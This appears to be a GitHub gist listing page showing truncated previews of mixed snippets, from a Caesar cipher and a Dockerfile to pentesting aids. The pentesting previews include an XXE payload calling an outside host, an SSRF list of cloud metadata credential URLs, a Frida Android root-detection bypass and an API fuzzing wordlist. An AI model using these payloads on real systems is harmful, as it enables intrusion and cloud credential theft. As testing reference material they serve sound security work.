@dmethvin
dmethvin / gist:1676346
Created January 25, 2012 13:51
Breakpoint on access to a property
function debugAccess(obj, prop, debugGet){
var origValue = obj[prop];
Object.defineProperty(obj, prop, {
get: function () {
if ( debugGet )
debugger;
return origValue;
},
@staaldraad
staaldraad / XXE_payloads
Last active June 15, 2024 16:32
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@BuffaloWill
BuffaloWill / cloud_metadata.txt
Last active May 25, 2024 21:22
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@CraigRodrigues
CraigRodrigues / caesar.c
Last active October 1, 2022 02:57
My solution to CS50 pset2 - "Hail, Caesar!"
#include <stdio.h>
#include <cs50.h>
#include <string.h>
#include <ctype.h>
/**
* Caesar.c
* A program that encrypts messages using Caesar’s cipher. Your program must
* accept a single command-line argument: a non-negative integer. Let’s call it
* k for the sake of discussion. If your program is executed without any
@hermanbanken
hermanbanken / Dockerfile
Last active June 9, 2024 22:18
Compiling NGINX module as dynamic module for use in docker
FROM nginx:alpine AS builder
# nginx:alpine contains NGINX_VERSION environment variable, like so:
# ENV NGINX_VERSION 1.15.0
# Our NCHAN version
ENV NCHAN_VERSION 1.1.15
# Download sources
RUN wget "http://nginx.org/download/nginx-${NGINX_VERSION}.tar.gz" -O nginx.tar.gz && \
@a7v8x
a7v8x / graphql_introspection_query.graphql
Last active November 5, 2023 12:36
GraphQL introspection query - for fetching the whole schema (from GraphiQL IDE) for https://atheros.ai/blog/graphql-introspection-and-introspection-queries
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
types {
...FullType
}
directives {
name
description
@pich4ya
pich4ya / root_bypass.js
Created August 5, 2019 20:14
Bypass Android Root Detection / Bypass RootBeer - August 2019
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
@yassineaboukir
yassineaboukir / List of API endpoints & objects
Last active June 14, 2024 01:38
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
@0xatul
0xatul / foxyproxyBB.json
Created June 25, 2020 09:46
firefox foxy proxy settings for BB stuff
{
"84kr3q1592995213323": {
"type": 1,
"color": "#cc883a",
"title": "Burp",
"active": true,
"address": "127.0.0.1",
"port": 8080,
"proxyDNS": false,
"username": "",
@LuD1161
LuD1161 / shodan_api_query.py
Created July 4, 2020 12:54
Query Shodan API : Plain and Simple
# -*- coding: utf-8 -*-
import requests
import time
import os
import json
import sys
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',